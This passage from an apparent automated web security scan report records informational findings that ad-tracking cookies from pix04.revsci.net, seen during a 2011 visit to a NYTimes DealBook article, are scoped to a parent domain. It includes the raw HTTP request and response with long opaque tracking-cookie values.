NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a8b1&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:04:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/225588936.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F09%252Fprivate-equity-has-a-horse-in-this-race%252F%26DM_CAT%3DNYTimesglobal%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gquhpCIKGAuq5fRa4Xl2IwC9pU+w6+9L42y41oDVUZb5s2bNa8jabVhWkrYcW9POLzC7mHn5XD+5kcRm9Ej7OPPmzGczLoQGAD4+mlCyw1VhRVLxG4hQ+WCi21gUr1ZTPL+gruAevoha7OGS623K8xyA07dj6zPJv+H/0n6817hXlqwQfDZkcIZI4MygcHJgoh426dFtLca2rjxg53k26V+5cxXgxVhg5Mb891U80/TjH9HHMhjrO61YWNi0gSNWS8WB/dbuAPnYyU+uFxoQIEv39QJMZYNbCJnUEVadipzIbXmIHFV8qNgwTXBP1iNqAqAjjHp338NIdd66GdSn48uSpCARemp8gQV3SRH4BGjpiBvpEd6arJtCCrS0Q18zylDuA74Y/tjQsUgCkiPmWxMMHriAR57SkGjQB6IRofvnzP2o6PFvv3ncBd4f/VtJaldXotvOVDnXOBcDqggJOR4z4zmZZ1E4kq6aYkMl1T3NJwVCCedTPtTvf01xbZ6WsvT5EFH9XRpLThbdUwXrhbAZ7XduchtE3zmWdITSVJKxKuUfiVDExBuSoAwxpaJj8l0B3MbY5gNyWjzjVSpveP9Qo7M4FeavFhqutbd8wrzm42JWbjOsRVvSL7bD7Vqmp+5iMziT2So9Cvzzn9voLENSuDHm090ZTdD7JK7Yd2leZkDlAaU1xWaFdQoXw5QJyBEGVY74DjT0GR5x/xL9797vXdoq6K3Q6K4+J2xBotqJtffqJViL1GA7Sb0GD5D37eSWaX3J6vfWA=; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rtc_qHsP=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; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_qHsP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+huQIMTzaxu2F29/z4Oss1gLZjSjagIGaQsDQ0ubO+NOVEpsZ5SuHqPlIcMQ/cvW9sjK6kuhf/9/9LK4/QiglY+E82qMXfc3Ur2YqYJhOnBRiAEKgmFzpRHtByzn85kSJ3FJXnfM7lp1rXGCAtCyOsR0o5AYgxZF27q6KHXshH7QqMZKdejkvRZ42rwWRuZM9/g+5Y1Fedrb8/4hiG6CEgOBsTzrivcBIXPvyJIWSEnVJqZN2dbyw4AVwVnd79qBwWxClGFSA7EPpoWFUyrGAgnlP9nHw+bGguQONFa7zaeQqaoxjGW/n7mlbbwbn3EpryAM4DI0loQRa1M9uuyQpCdmNjbassDtKeOxr4j10dwJi3e7kQyLCxhnM98vGppIJcV/1xTArabMmn9Q/NioL0UwPsaEBDRzIBkdVS27X3SpHBynn9Lth9scS7+7Sf2rTVAH8Qm5yWCD7PIVS6BMCQakVNSLgBnLGWQ3EUGQqdtffxhOx3+nKHDCU4YiJJ5TCeIubAMo6XeYxlR7B2V8OZjayRxIsAp3+KDT0+gk6NRKWjhJhzinsxvDU9BuCz+mxkrV1xbFN+BEZntlRwCUwBPC4ruEgyGonI3UIK2dg3ILUQy7y5xrhpijYJ/DT1qxMzUvMcBv8nc7sRH/CKmOD8YSW2QQKmDLfdKY8G1gXpRr43CyWS/hpU5rlQFkOOKu9K9h/juAyXN0GcZqUeoK7TnIk/LcbQE6VTt2LDG/ywqIQvQAV5W+cXjrFsqPExS4ZLgWR48xAOOvd8cR3ICGUpaUXNYQ==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
Set-Cookie: rtc_l-Qz=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
Set-Cookie: NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a8b1&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:04:17 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.60. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/273184684.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4kOheAIMDjaxc4NY5DAFqICTC+braGbBT2+Y8cJSum2Nh/fo4zpqNncA2iFgL+JsDGWsZjubK0mRsrZSYRyDO5HRLaWuSiEWtbINoWoEMyT7a/qEKOa4D1R1f1mo3AUgkUXRjwQp8/8ja+sf1AVNTSBhxseOtGzVtF57HQnSL31H0oMOfwJpbKN97qeK/wnePZFtxccShSexoZpb38b2k+YRK3its4s1Vl+dfe0xXAuc32r1E/ch5Ojd3ERdmLUGU0MhvzKOTCurdC9RTFdx6PRHh0LMAWqUPpQHjrd1hgjmhDDF9wJjtRZfN0n0HFOyl/r+gaLOXMY0YT9CBRO2G3jYrrYqJLJYkWoF+oA+rebP0tqo1E26tpEFNGKY5JiJsyyobn2vYFW2yCBerJMGeM+TgTEVO0SyxvW/kXN31OIFcpzAxg8mYjOOjbGP7JyGJMgKol+f6uC/lS40lTKyiit0jNXtepVEQrs1ZcEmZYiZKqSwdFgENEJuWK3XnmAkS8iId5bzhciwOcgj9C30hLGOxUsPabkC9nvsxna1v/gSNvztE3hSPTA7LG+jIAGXTgjeEs5gnfForSXcNfYR1yiAOQzFNTPFCPgSyzlHhKn5YBGuccH93FwDLX6+DV3q/gbsKlKRBKTQBqb3pjNfmhtIHd1IXNCF+U6puQthsVsqcpwnZSTYdcjrRe1Xi7Z0OepA56iKR1gDakJtHVc/C8ciXEYiEoDDcm5HnJ42L465lT9xK81lZBgzRdro9dWvdzfTIahwwZGupH3oeMmIdcnaCj0GgKI6vg5++WS+KUc=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/
